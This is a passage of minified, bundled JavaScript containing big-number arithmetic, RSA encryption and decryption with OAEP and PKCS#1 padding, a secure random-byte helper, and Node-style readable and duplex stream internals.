G<0||1===P&&0===G?f.div:0!==f.div.negative?f.div.isubn(1):f.div.iaddn(1)},I.prototype.modn=function(l){$(l<=67108863);for(var f=(1<<26)%l,A=0,v=this.length-1;v>=0;v--)A=(f*A+(0|this.words[v]))%l;return A},I.prototype.idivn=function(l){$(l<=67108863);for(var f=0,A=this.length-1;A>=0;A--){var v=(0|this.words[A])+67108864*f;this.words[A]=v/l|0,f=v%l}return this.strip()},I.prototype.divn=function(l){return this.clone().idivn(l)},I.prototype.egcd=function(l){$(0===l.negative),$(!l.isZero());var f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=new I(0),X=new I(1),L=0;f.isEven()&&A.isEven();)f.iushrn(1),A.iushrn(1),++L;for(var h=A.clone(),R=f.clone();!f.isZero();){for(var J=0,Z=1;0==(f.words[0]&Z)&&J<26;++J,Z<<=1);if(J>0)for(f.iushrn(J);J-- >0;)(v.isOdd()||P.isOdd())&&(v.iadd(h),P.isub(R)),v.iushrn(1),P.iushrn(1);for(var ue=0,Ie=1;0==(A.words[0]&Ie)&&ue<26;++ue,Ie<<=1);if(ue>0)for(A.iushrn(ue);ue-- >0;)(G.isOdd()||X.isOdd())&&(G.iadd(h),X.isub(R)),G.iushrn(1),X.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(G),P.isub(X)):(A.isub(f),G.isub(v),X.isub(P))}return{a:G,b:X,gcd:A.iushln(L)}},I.prototype._invmp=function(l){$(0===l.negative),$(!l.isZero());var J,f=this,A=l.clone();f=0!==f.negative?f.umod(l):f.clone();for(var v=new I(1),P=new I(0),G=A.clone();f.cmpn(1)>0&&A.cmpn(1)>0;){for(var X=0,L=1;0==(f.words[0]&L)&&X<26;++X,L<<=1);if(X>0)for(f.iushrn(X);X-- >0;)v.isOdd()&&v.iadd(G),v.iushrn(1);for(var h=0,R=1;0==(A.words[0]&R)&&h<26;++h,R<<=1);if(h>0)for(A.iushrn(h);h-- >0;)P.isOdd()&&P.iadd(G),P.iushrn(1);f.cmp(A)>=0?(f.isub(A),v.isub(P)):(A.isub(f),P.isub(v))}return(J=0===f.cmpn(1)?v:P).cmpn(0)<0&&J.iadd(l),J},I.prototype.gcd=function(l){if(this.isZero())return l.abs();if(l.isZero())return this.abs();var f=this.clone(),A=l.clone();f.negative=0,A.negative=0;for(var v=0;f.isEven()&&A.isEven();v++)f.iushrn(1),A.iushrn(1);for(;;){for(;f.isEven();)f.iushrn(1);for(;A.isEven();)A.iushrn(1);var P=f.cmp(A);if(P<0){var G=f;f=A,A=G}else if(0===P||0===A.cmpn(1))break;f.isub(A)}return A.iushln(v)},I.prototype.invm=function(l){return this.egcd(l).a.umod(l)},I.prototype.isEven=function(){return 0==(1&this.words[0])},I.prototype.isOdd=function(){return 1==(1&this.words[0])},I.prototype.andln=function(l){return this.words[0]&l},I.prototype.bincn=function(l){$("number"==typeof l);var f=l%26,A=(l-f)/26,v=1<<f;if(this.length<=A)return this._expand(A+1),this.words[A]|=v,this;for(var P=v,G=A;0!==P&&G<this.length;G++){var X=0|this.words[G];P=(X+=P)>>>26,this.words[G]=X&=67108863}return 0!==P&&(this.words[G]=P,this.length++),this},I.prototype.isZero=function(){return 1===this.length&&0===this.words[0]},I.prototype.cmpn=function(l){var A,f=l<0;if(0!==this.negative&&!f)return-1;if(0===this.negative&&f)return 1;if(this.strip(),this.length>1)A=1;else{f&&(l=-l),$(l<=67108863,"Number is too big");var v=0|this.words[0];A=v===l?0:v<l?-1:1}return 0!==this.negative?0|-A:A},I.prototype.cmp=function(l){if(0!==this.negative&&0===l.negative)return-1;if(0===this.negative&&0!==l.negative)return 1;var f=this.ucmp(l);return 0!==this.negative?0|-f:f},I.prototype.ucmp=function(l){if(this.length>l.length)return 1;if(this.length<l.length)return-1;for(var f=0,A=this.length-1;A>=0;A--){var v=0|this.words[A],P=0|l.words[A];if(v!==P){v<P?f=-1:v>P&&(f=1);break}}return f},I.prototype.gtn=function(l){return 1===this.cmpn(l)},I.prototype.gt=function(l){return 1===this.cmp(l)},I.prototype.gten=function(l){return this.cmpn(l)>=0},I.prototype.gte=function(l){return this.cmp(l)>=0},I.prototype.ltn=function(l){return-1===this.cmpn(l)},I.prototype.lt=function(l){return-1===this.cmp(l)},I.prototype.lten=function(l){return this.cmpn(l)<=0},I.prototype.lte=function(l){return this.cmp(l)<=0},I.prototype.eqn=function(l){return 0===this.cmpn(l)},I.prototype.eq=function(l){return 0===this.cmp(l)},I.red=function(l){return new le(l)},I.prototype.toRed=function(l){return $(!this.red,"Already a number in reduction context"),$(0===this.negative,"red works only with positives"),l.convertTo(this)._forceRed(l)},I.prototype.fromRed=function(){return $(this.red,"fromRed works only with numbers in reduction context"),this.red.convertFrom(this)},I.prototype._forceRed=function(l){return this.red=l,this},I.prototype.forceRed=function(l){return $(!this.red,"Already a number in reduction context"),this._forceRed(l)},I.prototype.redAdd=function(l){return $(this.red,"redAdd works only with red numbers"),this.red.add(this,l)},I.prototype.redIAdd=function(l){return $(this.red,"redIAdd works only with red numbers"),this.red.iadd(this,l)},I.prototype.redSub=function(l){return $(this.red,"redSub works only with red numbers"),this.red.sub(this,l)},I.prototype.redISub=function(l){return $(this.red,"redISub works only with red numbers"),this.red.isub(this,l)},I.prototype.redShl=function(l){return $(this.red,"redShl works only with red numbers"),this.red.shl(this,l)},I.prototype.redMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.mul(this,l)},I.prototype.redIMul=function(l){return $(this.red,"redMul works only with red numbers"),this.red._verify2(this,l),this.red.imul(this,l)},I.prototype.redSqr=function(){return $(this.red,"redSqr works only with red numbers"),this.red._verify1(this),this.red.sqr(this)},I.prototype.redISqr=function(){return $(this.red,"redISqr works only with red numbers"),this.red._verify1(this),this.red.isqr(this)},I.prototype.redSqrt=function(){return $(this.red,"redSqrt works only with red numbers"),this.red._verify1(this),this.red.sqrt(this)},I.prototype.redInvm=function(){return $(this.red,"redInvm works only with red numbers"),this.red._verify1(this),this.red.invm(this)},I.prototype.redNeg=function(){return $(this.red,"redNeg works only with red numbers"),this.red._verify1(this),this.red.neg(this)},I.prototype.redPow=function(l){return $(this.red&&!l.red,"redPow(normalNum)"),this.red._verify1(this),this.red.pow(this,l)};var O={k256:null,p224:null,p192:null,p25519:null};function U(z,l){this.name=z,this.p=new I(l,16),this.n=this.p.bitLength(),this.k=new I(1).iushln(this.n).isub(this.p),this.tmp=this._tmp()}function K(){U.call(this,"k256","ffffffff ffffffff ffffffff ffffffff ffffffff ffffffff fffffffe fffffc2f")}function ee(){U.call(this,"p224","ffffffff ffffffff ffffffff ffffffff 00000000 00000000 00000001")}function se(){U.call(this,"p192","ffffffff ffffffff ffffffff fffffffe ffffffff ffffffff")}function ve(){U.call(this,"25519","7fffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffed")}function le(z){if("string"==typeof z){var l=I._prime(z);this.m=l.p,this.prime=l}else $(z.gtn(1),"modulus must be greater than 1"),this.m=z,this.prime=null}function ye(z){le.call(this,z),this.shift=this.m.bitLength(),this.shift%26!=0&&(this.shift+=26-this.shift%26),this.r=new I(1).iushln(this.shift),this.r2=this.imod(this.r.sqr()),this.rinv=this.r._invmp(this.m),this.minv=this.rinv.mul(this.r).isubn(1).div(this.m),this.minv=this.minv.umod(this.r),this.minv=this.r.sub(this.minv)}U.prototype._tmp=function(){var l=new I(null);return l.words=new Array(Math.ceil(this.n/13)),l},U.prototype.ireduce=function(l){var A,f=l;do{this.split(f,this.tmp),A=(f=(f=this.imulK(f)).iadd(this.tmp)).bitLength()}while(A>this.n);var v=A<this.n?-1:f.ucmp(this.p);return 0===v?(f.words[0]=0,f.length=1):v>0?f.isub(this.p):void 0!==f.strip?f.strip():f._strip(),f},U.prototype.split=function(l,f){l.iushrn(this.n,0,f)},U.prototype.imulK=function(l){return l.imul(this.k)},ae(K,U),K.prototype.split=function(l,f){for(var A=4194303,v=Math.min(l.length,9),P=0;P<v;P++)f.words[P]=l.words[P];if(f.length=v,l.length<=9)return l.words[0]=0,void(l.length=1);var G=l.words[9];for(f.words[f.length++]=G&A,P=10;P<l.length;P++){var X=0|l.words[P];l.words[P-10]=(X&A)<<4|G>>>22,G=X}l.words[P-10]=G>>>=22,l.length-=0===G&&l.length>10?10:9},K.prototype.imulK=function(l){l.words[l.length]=0,l.words[l.length+1]=0,l.length+=2;for(var f=0,A=0;A<l.length;A++){var v=0|l.words[A];l.words[A]=67108863&(f+=977*v),f=64*v+(f/67108864|0)}return 0===l.words[l.length-1]&&(l.length--,0===l.words[l.length-1]&&l.length--),l},ae(ee,U),ae(se,U),ae(ve,U),ve.prototype.imulK=function(l){for(var f=0,A=0;A<l.length;A++){var v=19*(0|l.words[A])+f,P=67108863&v;v>>>=26,l.words[A]=P,f=v}return 0!==f&&(l.words[l.length++]=f),l},I._prime=function(l){if(O[l])return O[l];var f;if("k256"===l)f=new K;else if("p224"===l)f=new ee;else if("p192"===l)f=new se;else{if("p25519"!==l)throw new Error("Unknown prime "+l);f=new ve}return O[l]=f,f},le.prototype._verify1=function(l){$(0===l.negative,"red works only with positives"),$(l.red,"red works only with red numbers")},le.prototype._verify2=function(l,f){$(0==(l.negative|f.negative),"red works only with positives"),$(l.red&&l.red===f.red,"red works only with red numbers")},le.prototype.imod=function(l){return this.prime?this.prime.ireduce(l)._forceRed(this):l.umod(this.m)._forceRed(this)},le.prototype.neg=function(l){return l.isZero()?l.clone():this.m.sub(l)._forceRed(this)},le.prototype.add=function(l,f){this._verify2(l,f);var A=l.add(f);return A.cmp(this.m)>=0&&A.isub(this.m),A._forceRed(this)},le.prototype.iadd=function(l,f){this._verify2(l,f);var A=l.iadd(f);return A.cmp(this.m)>=0&&A.isub(this.m),A},le.prototype.sub=function(l,f){this._verify2(l,f);var A=l.sub(f);return A.cmpn(0)<0&&A.iadd(this.m),A._forceRed(this)},le.prototype.isub=function(l,f){this._verify2(l,f);var A=l.isub(f);return A.cmpn(0)<0&&A.iadd(this.m),A},le.prototype.shl=function(l,f){return this._verify1(l),this.imod(l.ushln(f))},le.prototype.imul=function(l,f){return this._verify2(l,f),this.imod(l.imul(f))},le.prototype.mul=function(l,f){return this._verify2(l,f),this.imod(l.mul(f))},le.prototype.isqr=function(l){return this.imul(l,l.clone())},le.prototype.sqr=function(l){return this.mul(l,l)},le.prototype.sqrt=function(l){if(l.isZero())return l.clone();var f=this.m.andln(3);if($(f%2==1),3===f){var A=this.m.add(new I(1)).iushrn(2);return this.pow(l,A)}for(var v=this.m.subn(1),P=0;!v.isZero()&&0===v.andln(1);)P++,v.iushrn(1);$(!v.isZero());var G=new I(1).toRed(this),X=G.redNeg(),L=this.m.subn(1).iushrn(1),h=this.m.bitLength();for(h=new I(2*h*h).toRed(this);0!==this.pow(h,L).cmp(X);)h.redIAdd(X);for(var R=this.pow(h,v),J=this.pow(l,v.addn(1).iushrn(1)),Z=this.pow(l,v),ue=P;0!==Z.cmp(G);){for(var Ie=Z,Ae=0;0!==Ie.cmp(G);Ae++)Ie=Ie.redSqr();$(Ae<ue);var Ue=this.pow(R,new I(1).iushln(ue-Ae-1));J=J.redMul(Ue),R=Ue.redSqr(),Z=Z.redMul(R),ue=Ae}return J},le.prototype.invm=function(l){var f=l._invmp(this.m);return 0!==f.negative?(f.negative=0,this.imod(f).redNeg()):this.imod(f)},le.prototype.pow=function(l,f){if(f.isZero())return new I(1).toRed(this);if(0===f.cmpn(1))return l.clone();var v=new Array(16);v[0]=new I(1).toRed(this),v[1]=l;for(var P=2;P<v.length;P++)v[P]=this.mul(v[P-1],l);var G=v[0],X=0,L=0,h=f.bitLength()%26;for(0===h&&(h=26),P=f.length-1;P>=0;P--){for(var R=f.words[P],J=h-1;J>=0;J--){var Z=R>>J&1;G!==v[0]&&(G=this.sqr(G)),0!==Z||0!==X?(X<<=1,X|=Z,(4==++L||0===P&&0===J)&&(G=this.mul(G,v[X]),L=0,X=0)):L=0}h=26}return G},le.prototype.convertTo=function(l){var f=l.umod(this.m);return f===l?f.clone():f},le.prototype.convertFrom=function(l){var f=l.clone();return f.red=null,f},I.mont=function(l){return new ye(l)},ae(ye,le),ye.prototype.convertTo=function(l){return this.imod(l.ushln(this.shift))},ye.prototype.convertFrom=function(l){var f=this.imod(l.mul(this.rinv));return f.red=null,f},ye.prototype.imul=function(l,f){if(l.isZero()||f.isZero())return l.words[0]=0,l.length=1,l;var A=l.imul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.mul=function(l,f){if(l.isZero()||f.isZero())return new I(0)._forceRed(this);var A=l.mul(f),v=A.maskn(this.shift).mul(this.minv).imaskn(this.shift).mul(this.m),P=A.isub(v).iushrn(this.shift),G=P;return P.cmp(this.m)>=0?G=P.isub(this.m):P.cmpn(0)<0&&(G=P.iadd(this.m)),G._forceRed(this)},ye.prototype.invm=function(l){return this.imod(l._invmp(this.m).mul(this.r2))._forceRed(this)}}(Pe=de.nmd(Pe),this)},8064:(Pe,we,de)=>{var ie=de(3262),j=de(7489),$=de(5174),ae=de(3355),I=de(2005),Q=de(2161),F=de(623),E=de(265).Buffer;Pe.exports=function(M,p,D){var w;w=M.padding?M.padding:D?1:4;var O,x=ie(M),S=x.modulus.byteLength();if(p.length>S||new ae(p).cmp(x.modulus)>=0)throw new Error("decryption error");O=D?F(new ae(p),x):I(p,x);var U=E.alloc(S-O.length);if(O=E.concat([U,O],S),4===w)return function g(y,M){var p=y.modulus.byteLength(),D=Q("sha1").update(E.alloc(0)).digest(),w=D.length;if(0!==M[0])throw new Error("decryption error");var x=M.slice(1,w+1),S=M.slice(w+1),O=$(x,j(S,w)),U=$(S,j(O,p-w-1));if(function _(y,M){y=E.from(y),M=E.from(M);var p=0,D=y.length;y.length!==M.length&&(p++,D=Math.min(y.length,M.length));for(var w=-1;++w<D;)p+=y[w]^M[w];return p}(D,U.slice(0,w)))throw new Error("decryption error");for(var K=w;0===U[K];)K++;if(1!==U[K++])throw new Error("decryption error");return U.slice(K)}(x,O);if(1===w)return function b(y,M,p){for(var D=M.slice(0,2),w=2,x=0;0!==M[w++];)if(w>=M.length){x++;break}var S=M.slice(2,w-1);if(("0002"!==D.toString("hex")&&!p||"0001"!==D.toString("hex")&&p)&&x++,S.length<8&&x++,x)throw new Error("decryption error");return M.slice(w)}(0,O,D);if(3===w)return O;throw new Error("unknown padding")}},1599:(Pe,we,de)=>{var ie=de(3262),j=de(2419),$=de(2161),ae=de(7489),I=de(5174),Q=de(3355),F=de(623),E=de(2005),g=de(265).Buffer;Pe.exports=function(p,D,w){var x;x=p.padding?p.padding:w?1:4;var O,S=ie(p);if(4===x)O=function b(M,p){var D=M.modulus.byteLength(),w=p.length,x=$("sha1").update(g.alloc(0)).digest(),S=x.length,O=2*S;if(w>D-O-2)throw new Error("message too long");var U=g.alloc(D-w-O-2),K=D-S-1,ee=j(S),se=I(g.concat([x,U,g.alloc(1,1),p],K),ae(ee,K)),ve=I(ee,ae(se,S));return new Q(g.concat([g.alloc(1),ve,se],D))}(S,D);else if(1===x)O=function _(M,p,D){var S,w=p.length,x=M.modulus.byteLength();if(w>x-11)throw new Error("message too long");return S=D?g.alloc(x-w-3,255):function y(M){for(var S,p=g.allocUnsafe(M),D=0,w=j(2*M),x=0;D<M;)x===w.length&&(w=j(2*M),x=0),(S=w[x++])&&(p[D++]=S);return p}(x-w-3),new Q(g.concat([g.from([0,D?1:2]),S,g.alloc(1),p],x))}(S,D,w);else{if(3!==x)throw new Error("unknown padding");if((O=new Q(D)).cmp(S.modulus)>=0)throw new Error("data too long for modulus")}return w?E(O,S):F(O,S)}},623:(Pe,we,de)=>{var ie=de(3355),j=de(265).Buffer;Pe.exports=function $(ae,I){return j.from(ae.toRed(ie.mont(I.modulus)).redPow(new ie(I.publicExponent)).fromRed().toArray())}},5174:Pe=>{Pe.exports=function(de,ie){for(var j=de.length,$=-1;++$<j;)de[$]^=ie[$];return de}},2419:(Pe,we,de)=>{"use strict";var ie=de(5486),j=65536,I=de(265).Buffer,Q=global.crypto||global.msCrypto;Pe.exports=Q&&Q.getRandomValues?function F(E,g){if(E>4294967295)throw new RangeError("requested too many random bytes");var b=I.allocUnsafe(E);if(E>0)if(E>j)for(var _=0;_<E;_+=j)Q.getRandomValues(b.slice(_,_+j));else Q.getRandomValues(b);return"function"==typeof g?ie.nextTick(function(){g(null,b)}):b}:function ae(){throw new Error("Secure random number generation is not supported by this browser.\nUse Chrome, Firefox or Internet Explorer 11")}},3478:(Pe,we,de)=>{"use strict";var ie=de(5486);function j(){throw new Error("secure random number generation not supported by this browser\nuse chrome, FireFox or Internet Explorer 11")}var $=de(265),ae=de(2419),I=$.Buffer,Q=$.kMaxLength,F=global.crypto||global.msCrypto,E=Math.pow(2,32)-1;function g(p,D){if("number"!=typeof p||p!=p)throw new TypeError("offset must be a number");if(p>E||p<0)throw new TypeError("offset must be a uint32");if(p>Q||p>D)throw new RangeError("offset out of range")}function b(p,D,w){if("number"!=typeof p||p!=p)throw new TypeError("size must be a number");if(p>E||p<0)throw new TypeError("size must be a uint32");if(p+D>w||p>Q)throw new RangeError("buffer too small")}function y(p,D,w,x){if(ie.browser){var O=new Uint8Array(p.buffer,D,w);return F.getRandomValues(O),x?void ie.nextTick(function(){x(null,p)}):p}if(!x)return ae(w).copy(p,D),p;ae(w,function(K,ee){if(K)return x(K);ee.copy(p,D),x(null,p)})}F&&F.getRandomValues||!ie.browser?(we.randomFill=function _(p,D,w,x){if(!(I.isBuffer(p)||p instanceof global.Uint8Array))throw new TypeError('"buf" argument must be a Buffer or Uint8Array');if("function"==typeof D)x=D,D=0,w=p.length;else if("function"==typeof w)x=w,w=p.length-D;else if("function"!=typeof x)throw new TypeError('"cb" argument must be a function');return g(D,p.length),b(w,D,p.length),y(p,D,w,x)},we.randomFillSync=function M(p,D,w){if(void 0===D&&(D=0),!(I.isBuffer(p)||p instanceof global.Uint8Array))throw new TypeError('"buf" argument must be a Buffer or Uint8Array');return g(D,p.length),void 0===w&&(w=p.length-D),b(w,D,p.length),y(p,D,w)}):(we.randomFill=j,we.randomFillSync=j)},3749:Pe=>{"use strict";var de={};function ie(Q,F,E){E||(E=Error);var b=function(_){function y(M,p,D){return _.call(this,function g(_,y,M){return"string"==typeof F?F:F(_,y,M)}(M,p,D))||this}return function we(Q,F){Q.prototype=Object.create(F.prototype),Q.prototype.constructor=Q,Q.__proto__=F}(y,_),y}(E);b.prototype.name=E.name,b.prototype.code=Q,de[Q]=b}function j(Q,F){if(Array.isArray(Q)){var E=Q.length;return Q=Q.map(function(g){return String(g)}),E>2?"one of ".concat(F," ").concat(Q.slice(0,E-1).join(", "),", or ")+Q[E-1]:2===E?"one of ".concat(F," ").concat(Q[0]," or ").concat(Q[1]):"of ".concat(F," ").concat(Q[0])}return"of ".concat(F," ").concat(String(Q))}ie("ERR_INVALID_OPT_VALUE",function(Q,F){return'The value "'+F+'" is invalid for option "'+Q+'"'},TypeError),ie("ERR_INVALID_ARG_TYPE",function(Q,F,E){var g,b;if("string"==typeof F&&function $(Q,F,E){return Q.substr(!E||E<0?0:+E,F.length)===F}(F,"not ")?(g="must not be",F=F.replace(/^not /,"")):g="must be",function ae(Q,F,E){return(void 0===E||E>Q.length)&&(E=Q.length),Q.substring(E-F.length,E)===F}(Q," argument"))b="The ".concat(Q," ").concat(g," ").concat(j(F,"type"));else{var _=function I(Q,F,E){return"number"!=typeof E&&(E=0),!(E+F.length>Q.length)&&-1!==Q.indexOf(F,E)}(Q,".")?"property":"argument";b='The "'.concat(Q,'" ').concat(_," ").concat(g," ").concat(j(F,"type"))}return b+". Received type ".concat(typeof E)},TypeError),ie("ERR_STREAM_PUSH_AFTER_EOF","stream.push() after EOF"),ie("ERR_METHOD_NOT_IMPLEMENTED",function(Q){return"The "+Q+" method is not implemented"}),ie("ERR_STREAM_PREMATURE_CLOSE","Premature close"),ie("ERR_STREAM_DESTROYED",function(Q){return"Cannot call "+Q+" after a stream was destroyed"}),ie("ERR_MULTIPLE_CALLBACK","Callback called multiple times"),ie("ERR_STREAM_CANNOT_PIPE","Cannot pipe, not readable"),ie("ERR_STREAM_WRITE_AFTER_END","write after end"),ie("ERR_STREAM_NULL_VALUES","May not write null values to stream",TypeError),ie("ERR_UNKNOWN_ENCODING",function(Q){return"Unknown encoding: "+Q},TypeError),ie("ERR_STREAM_UNSHIFT_AFTER_END_EVENT","stream.unshift() after end event"),Pe.exports.q=de},5157:(Pe,we,de)=>{"use strict";var ie=de(5486),j=Object.keys||function(_){var y=[];for(var M in _)y.push(M);return y};Pe.exports=E;var $=de(5455),ae=de(2481);de(2270)(E,$);for(var I=j(ae.prototype),Q=0;Q<I.length;Q++){var F=I[Q];E.prototype[F]||(E.prototype[F]=ae.prototype[F])}function E(_){if(!(this instanceof E))return new E(_);$.call(this,_),ae.call(this,_),this.allowHalfOpen=!0,_&&(!1===_.readable&&(this.readable=!1),!1===_.writable&&(this.writable=!1),!1===_.allowHalfOpen&&(this.allowHalfOpen=!1,this.once("end",g)))}function g(){this._writableState.ended||ie.nextTick(b,this)}function b(_){_.end()}Object.defineProperty(E.prototype,"writableHighWaterMark",{enumerable:!1,get:function(){return this._writableState.highWaterMark}}),Object.defineProperty(E.prototype,"writableBuffer",{enumerable:!1,get:function(){return this._writableState&&this._writableState.getBuffer()}}),Object.defineProperty(E.prototype,"writableLength",{enumerable:!1,get:function(){return this._writableState.length}}),Object.defineProperty(E.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&void 0!==this._writableState&&this._readableState.destroyed&&this._writableState.destroyed},set:function(y){void 0===this._readableState||void 0===this._writableState||(this._readableState.destroyed=y,this._writableState.destroyed=y)}})},8743:(Pe,we,de)=>{"use strict";Pe.exports=j;var ie=de(3148);function j($){if(!(this instanceof j))return new j($);ie.call(this,$)}de(2270)(j,ie),j.prototype._transform=function($,ae,I){I(null,$)}},5455:(Pe,we,de)=>{"use strict";var j,ie=de(5486);Pe.exports=l,l.ReadableState=z,de(8227);var _,ae=function(me,Ke){return me.listeners(Ke).length},I=de(7064),Q=de(5449).Buffer,F=("undefined"!=typeof global?global:"undefined"!=typeof window?window:"undefined"!=typeof self?self:{}).Uint8Array||function(){},b=de(4616);_=b&&b.debuglog?b.debuglog("stream"):function(){};var K,ee,se,y=de(658),M=de(3475),D=de(7456).getHighWaterMark,w=de(3749).q,x=w.ERR_INVALID_ARG_TYPE,S=w.ERR_STREAM_PUSH_AFTER_EOF,O=w.ERR_METHOD_NOT_IMPLEMENTED,U=w.ERR_STREAM_UNSHIFT_AFTER_END_EVENT;de(2270)(l,I);var ve=M.errorOrDestroy,le=["error","close","destroy","pause","resume"];function z(ze,me,Ke){j=j||de(5157),"boolean"!=typeof Ke&&(Ke=me instanceof j),this.objectMode=!!(ze=ze||{}).objectMode,Ke&&(this.objectMode=this.objectMode||!!ze.readableObjectMode),this.highWaterMark=D(this,ze,"readableHighWaterMark",Ke),this.buffer=new y,this.length=0,this.pipes=null,this.pipesCount=0,this.flowing=null,this.ended=!1,this.endEmitted=!1,this.reading=!1,this.sync=!0,this.needReadable=!1,this.emittedReadable=!1,this.readableListening=!1,this.resumeScheduled=!1,this.paused=!0,this.emitClose=!1!==ze.emitClose,this.autoDestroy=!!ze.autoDestroy,this.destroyed=!1,this.defaultEncoding=ze.defaultEncoding||"utf8",this.awaitDrain=0,this.readingMore=!1,this.decoder=null,this.encoding=null,ze.encoding&&(K||(K=de(5741).s),this.decoder=new K(ze.encoding),this.encoding=ze.encoding)}function l(ze){if(j=j||de(5157),!(this instanceof l))return new l(ze);this._readableState=new z(ze,this,this instanceof j),this.readable=!0,ze&&("function"==typeof ze.read&&(this._read=ze.read),"function"==typeof ze.destroy&&(this._destroy=ze.destroy)),I.call(this)}function f(ze,me,Ke,rt,Ge){_("readableAddChunk",me);var ht,Qe=ze._readableState;if(null===me)Qe.reading=!1,function L(ze,me){if(_("onEofChunk"),!me.ended){if(me.decoder){var Ke=me.decoder.end();Ke&&Ke.length&&(me.buffer.push(Ke),me.length+=me.objectMode?1:Ke.length)}me.ended=!0,me.sync?h(ze):(me.needReadable=!1,me.emittedReadable||(me.emittedReadable=!0,R(ze)))}}(ze,Qe);else if(Ge||(ht=function v(ze,me){var Ke;return!function g(ze){return Q.isBuffer(ze)||ze instanceof F}(me)&&"string"!=typeof me&&void 0!==me&&!ze.objectMode&&(Ke=new x("chunk",["string","Buffer","Uint8Array"],me)),Ke}(Qe,me)),ht)ve(ze,ht);else if(Qe.objectMode||me&&me.length>0)if("string"!=typeof me&&!Qe.objectMode&&Object.getPrototypeOf(me)!==Q.prototype&&(me=function E(ze){return Q.from(ze)}(me)),rt)Qe.endEmitted?ve(ze,new U):A(ze,Qe,me,!0);else if(Qe.ended)ve(ze,new S);else{if(Qe.destroyed)return!1;Qe.reading=!1,Qe.decoder&&!Ke?(me=Qe.decoder.write(me),Qe.objectMode||0!==me.length?A(ze,Qe,me,!1):J(ze,Qe)):A(ze,Qe,me,!1)}else rt||(Qe.reading=!1,J(ze,Qe));return!Qe.ended&&(Qe.length<Qe.highWaterMark||0===Qe.length)}function A(ze,me,Ke,rt){me.flowing&&0===me.length&&!me.sync?(me.awaitDrain=0,ze.emit("data",Ke)):(me.length+=me.objectMode?1:Ke.length,rt?me.buffer.unshift(Ke):me.buffer.push(Ke),me.needReadable&&h(ze)),J(ze,me)}Object.defineProperty(l.prototype,"destroyed",{enumerable:!1,get:function(){return void 0!==this._readableState&&this._readableState.destroyed},set:function(me){!this._readableState||(this._readableState.destroyed=me)}}),l.prototype.destroy=M.destroy,l.prototype._undestroy=M.undestroy,l.prototype._destroy=function(ze,me){me(ze)},l.prototype.push=function(ze,me){var rt,Ke=this._readableState;return Ke.objectMode?rt=!0:"string"==typeof ze&&((me=me||Ke.defaultEncoding)!==Ke.encoding&&(ze=Q.from(ze,me),me=""),rt=!0),f(this,ze,me,!1,rt)},l.prototype.unshift=function(ze){return f(this,ze,null,!0,!1)},l.prototype.isPaused=function(){return!1===this._readableState.flowing},l.prototype.setEncoding=function(ze){K||(K=de(5741).s);var me=new K(ze);this._readableState.decoder=me,this._readableState.encoding=this._readableState.decoder.encoding;for(var Ke=this._readableState.buffer.head,rt="";null!==Ke;)rt+=me.write(Ke.data),Ke=Ke.next;return this._readableState.buffer.clear(),""!==rt&&this._readableState.buffer.push(rt),this._readableState.length=rt.length,this};var P=1073741824;function X(ze,me){return ze<=0||0===me.length&&me.ended?0:me.objectMode?1:ze!=ze?me.flowing&&me.length?me.buffer.head.data.length:me.length:(ze>me.highWaterMark&&(me.highWaterMark=function G(ze){return ze>=P?ze=P:(ze--,ze|=ze>>>1,ze|=ze>>>2,ze|=ze>>>4,ze|=ze>>>8,ze|=ze>>>16,ze++),ze}(ze)),ze<=me.length?ze:me.ended?me.length:(me.needReadable=!0,0))}function h(ze){var me=ze._readableState;_("emitReadable",me.needReadable,me.emittedReadable),me.needReadable=!1,me.emittedReadable||(_("emitReadable",me.flowing),me.emittedReadable=!0,ie.nextTick(R,ze))}function R(ze){var me=ze._readableState;_("emitReadable_",me.destroyed,me.length,me.ended),!me.destroyed&&(me.length||me.ended)&&(ze.emit("readable"),me.emittedReadable=!1),me.needReadable=!me.flowing&&!me.ended&&me.length<=me.highWaterMark,He(ze)}function J(ze,me){me.readingMore||(me.readingMore=!0,ie.nextTick(Z,ze,me))}function Z(ze,me){for(;!me.reading&&!me.ended&&(me.length<me.highWaterMark||me.flowing&&0===me.length);){var Ke=me.length;if(_("maybeReadMore read 0"),ze.read(0),Ke===me.length)break}me.readingMore=!1}function Ie(ze){var me=ze._readableState;me.readableListening=ze.listenerCount("readable")>0,me.resumeScheduled&&!me.paused?me.flowing=!0:ze.listenerCount("data")>0&&ze.resume()}function Ae(ze){_("readable nexttick read 0"),ze.read(0)}function Xe(ze,me){_("resume",me.reading),me.reading||ze.read(0),me.resumeScheduled=!1,ze.emit("resume"),He(ze),me.flowing&&!me.reading&&ze.read(0)}function He(ze){var me=ze._readableState;for(_("flow",me.flowing);me.flowing&&null!==ze.read(););}function Be(ze,me){return 0===me.length?null:(me.objectMode?Ke=me.buffer.shift():!ze||ze>=me.length?(Ke=me.decoder?me.buffer.join(""):1===me.buffer.length?me.buffer.first():me.buffer.concat(me.length),me.buffer.clear()):Ke=me.buffer.consume(ze,me.decoder),Ke);var Ke}function qe(ze){var me=ze._readableState;_("endReadable",me.endEmitted),me.endEmitted||(me.ended=!0,ie.nextTick(De,me,ze))}function De(ze,me){if(_("endReadableNT",ze.endEmitted,ze.length),!ze.endEmitted&&0===ze.length&&(ze.endEmitted=!0,me.readable=!1,me.emit("end"),ze.autoDestroy)){var Ke=me._writableState;(!Ke||Ke.autoDestroy&&Ke.finished)&&me.destroy()}}function Ve(ze,me){for(var Ke=0,rt=ze.length;Ke<rt;Ke++)if(ze[Ke]===me)return Ke;return-1}l.prototype.read=function(ze){_("read",ze),ze=parseInt(ze,10);var me=this._readableState,Ke=ze;if(0!==ze&&(me.emittedReadable=!1),0===ze&&me.needReadable&&((0!==me.highWaterMark?me.length>=me.highWaterMark:me.length>0)||me.ended))return _("read: emitReadable",me.length,me.ended),0===me.length&&me.ended?qe(this):h(this),null;if(0===(ze=X(ze,me))&&me.ended)return 0===me.length&&qe(this),null;var Ge,rt=me.needReadable;return _("need readable",rt),(0===me.length||me.length-ze<me.highWaterMark)&&_("length less than watermark",rt=!0),me.ended||me.reading?_("reading or 